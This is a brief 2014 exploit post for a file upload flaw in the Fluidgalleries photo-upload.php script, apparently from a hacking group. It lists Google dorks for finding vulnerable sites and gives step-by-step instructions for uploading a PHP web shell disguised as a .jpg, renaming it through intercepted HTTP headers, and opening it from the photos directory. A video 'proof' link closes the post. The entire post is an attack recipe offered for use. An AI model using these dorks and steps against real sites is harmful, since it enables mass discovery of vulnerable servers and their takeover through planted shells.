Monday, 30 June 2014

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:
inurl:"fluidgalleries/dat/info.dat"
 inurl:"/fluidgalleries/php/"
Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
*Use Firefox...

Use Live HTTP Headers... Then go to here:
http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg] 

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :
http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf